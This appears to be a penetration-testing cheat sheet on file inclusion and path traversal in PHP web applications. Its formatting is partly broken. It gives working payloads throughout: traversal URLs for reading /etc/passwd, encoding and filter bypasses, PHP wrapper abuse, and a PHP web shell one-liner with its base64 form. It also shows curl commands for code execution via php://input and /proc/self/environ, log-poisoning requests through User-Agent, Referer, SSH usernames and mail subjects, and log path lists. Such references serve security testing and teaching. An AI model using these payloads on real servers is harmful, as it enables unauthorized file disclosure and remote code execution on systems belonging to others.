File Inclusion and Path Traversal
At a Glance
File inclusion is the method for applications, and scripts, to include local or remote files during run-time. The vulnerability occurs when an application generates a path to executable code using an attacker-controlled variable, giving the attacker control over which file is executed.
There are two different types. Local File Inclusion (LFI) where the application includes files on the current server. And Remote File Inclusion (RFI) where the application downloads and execute files from a remote server. 1
A path, or directory, traversal attack consists of exploiting weak validation, or sanitization, of user-supplied data allowing the attacker to read files, or directories, outside the context of the current application.
The use of these techniques may lead to information disclosure, cross-site-Scripting (XSS), and remote code execution (RCE).2
Absolute Path Traversal
Relative Path Traversal
Sometimes applications append extra characters, like file extensions, to the input variable. A null byte will make the application ignore the following characters.
Note: PHP fixed the issue in version 5.3.4. https://bugs.php.net/bug.php?id=39863
In PHP, filenames longer than 4096 bytes will be truncated and, characters after that, ignored.
http://example.com/index.php?page=../../../etc/passwd................[ADD MORE] http://example.com/index.php?page=../../../etc/passwd\.\.\.\.\.\.\.\.[ADD MORE] http://example.com/index.php?page=../../../etc/passwd/./././././././.[ADD MORE] http://example.com/index.php?page=../../../[ADD MORE]../../../../../etc/passwd
Manipulating variables that reference files
with “dot-dot-slash” (
../) sequences and its variations,
or using absolute file paths,
may allow bypassing poorly implemented input filtering.
|URL||Double URL||UTF-8 Unicode||16 bits Unicode|
%2e%2e%2f %252e%252e%252f %c0%ae%c0%ae%c0%af %uff0e%uff0e%u2215
%2e%2e%2c %252e%252e%252c %c0%ae%c0%ae%c0%af %uff0e%uff0e%u2216
Double URL Encoding
http://example.com/index.php?page=....//....//etc/passwd http://example.com/index.php?page=..///////..////..//////etc/passwd http://example.com/index.php?page=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd
../ replaced with
Windows UNC Share 4
Windows UNC shares can be injected to redirect access to other resources.
Most filter bypassing techniques for LFI can be used for RFI.
it is possible to bypass disabled
Simply including a script
located in an open share.
PHP Stream Wrappers
PHP provides many built-in wrappers
for various protocols,
to use with file functions
php://filter is a kind of meta-wrapper
that allows filtering a stream
before the content is read.
The resulting data
is the encoded version
of the given file’s source code.
Multiple filter chains can be specified on one path,
Filter chaining zlib.deflate and convert.base64.
Base64 decode and gzip inflate.
The resulting encoded string can be decoded and inflated by piping it into the following PHP script:
echo [BASE64-STR] | php -r 'echo gzinflate(base64_decode(file_get_contents("php://stdin")));'
zip:// is a wrapper for zip compression streams.
To leverage the zip functionalities,
upload a zipped PHP script to the server
(with the preferred extension)
and decompress in the server
<file> the resulting decompressed file.
echo -n '<?php system($_GET['c']); ?>' > shell.php zip shell.jpg shell.php
PHP Shell Script.
echo -n '<?php system($_GET['c']); ?>' | base64 PD9waHAgc3lzdGVtKCRfR0VUW2NdKTsgPz4=
expect:// wrapper provide access to processes’
php://input is a read-only stream that allows to read raw data
from the request body.
curl -X POST --data "<?php echo shell_exec('ls'); ?>" "http://example.com/index.php?page=php://input%00" -v
proc File System
proc file system (
contains a hierarchy of special files
that represent the current state of the kernel.
It acts as an interface
to internal data structures in the kernel
for applications and users.
Because of its abstract properties, it is also referred to as a virtual file system.
File within this directory are listed as zero bytes in size, even though, can contain a large amount of data. 7
/proc directory contains
one subdirectory for each process
running on the system,
which is named
after the process ID (PID).
each of these directories
contains files to store information
about the respective process.
represents the currently scheduled PID.
In other words,
a symbolic link
to the currently running process’s directory.
It is a self-referenced device driver, or module, maintained by the Kernel.
/proc/version: Kernel version.
/proc/sched_debug: Scheduling information and running processes per CPU.
/proc/mounts: Mounted file systems.
/proc/net/arp: ARP table.
/proc/net/route: Routing table.
udp: TCP or UDP active connections.
/proc/net/fib_trie: Routing tables trie.9
/proc/[PID]/cmdlineProcess invocation command with parameters.
It potentially exposes paths, usernames and passwords.
It potentially exposes paths, usernames and passwords.
/proc/[PID]/cwdProcess’ current working directory.
Contains one entry for each file which the process has open.
LFI2RCE - /proc
/proc/self/environ contains user inputs
that turn it
in a useful volatile storage.
Apache stores an environment variable
to be used by
the self-contained modules.10
curl "http://example.com/index.php?page=/proc/self/environ&c=id" -H "User-Agent" --data "<?php system($_GET['c']); ?>"
Upload A LOT of shells.
Bruteforce the process ID (
$PID) and file descriptor id (
LFI2RCE - Log Poisoning
A log file is a file that contains a record of events from an application. A log poisoning attack consists of triggering one of these events with executable code as part of the logged data, and successively, through LFI, include and execute the code.
It is recommended to first load the target log, not only to verify the access but to identify what data is being stored.
Administrators can modify the logged data according to their needs.
Apache maintains access and error logs.
Make a valid request
with the code in the
curl -H 'User-Agent' --data "<?php system($_GET['c']); ?>" "http://example.com" -v
Make an invalid request,
an invalid inclusion for example,
with the suitable
curl -H 'Referer' --data "<?php system($_GET['c']); ?>" "http://example.com/invalid#req" -v
The Apache logging API escapes strings going to the logs.
Use single quotes (
since double quotes (
") are replaced escaped as
Common Apache Log Paths
Log files can also be set to custom locations, either globally, or domain based if virtual hosting is enabled.
/var/log/httpd/access_log /var/log/httpd/error_log /var/log/apache/access.log /var/log/apache/error.log /var/log/apache2/access.log /var/log/apache2/error.log /usr/local/apache/log/access_log /usr/local/apache/log/error_log /usr/local/apache2/log/access_log /usr/local/apache2/log/error_log /var/log/nginx/access.log /var/log/nginx/error.log
SSH logs the username of each connection. Create a connection to SSH with the suitable username.
ssh '<?php system('id'); ?>'@example.com
Common SSH Log Paths
Email an internal account, containing the script.
mail -s "<?php system($_GET['c']);?>" firstname.lastname@example.org < /dev/null
- OWASP - Testing Directory Traversal File Include
- BSidesMCR 2018: It’s A PHP Unserialization Vulnerability Jim, But Not As We Know It by Sam Thomas
- PayloadsAllTheThings Intruders
Contributors to Wikimedia projects. “File Inclusion Vulnerability - Wikipedia.” Wikipedia, the Free Encyclopedia, Wikimedia Foundation, Inc., 24 Nov. 2006, https://en.wikipedia.org/wiki/File_inclusion_vulnerability. ↩︎
swisskyrepo. “PayloadsAllTheThings / Directory Traversal.” GitHub, https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Directory%20Traversal. ↩︎
“The /Proc Filesystem.” The Linux Kernel Documentation, https://www.kernel.org/doc/html/latest/filesystems/proc.html. ↩︎
Bernat, Vincent. “IPv4 Route Lookup on Linux ⁕ Vincent Bernat.” MTU Ninja Vincent Bernat, https://vincent.bernat.ch/en/blog/2017-ipv4-route-lookup-linux. ↩︎
“LFI2RCE (Local File Inclusion to Remote Code Execution) Advanced Exploitation: /Proc Shortcuts.” Ush.It - a Beautiful Place, https://www.ush.it/2008/08/18/lfi2rce-local-file-inclusion-to-remote-code-execution-advanced-exploitation-proc-shortcuts/. ↩︎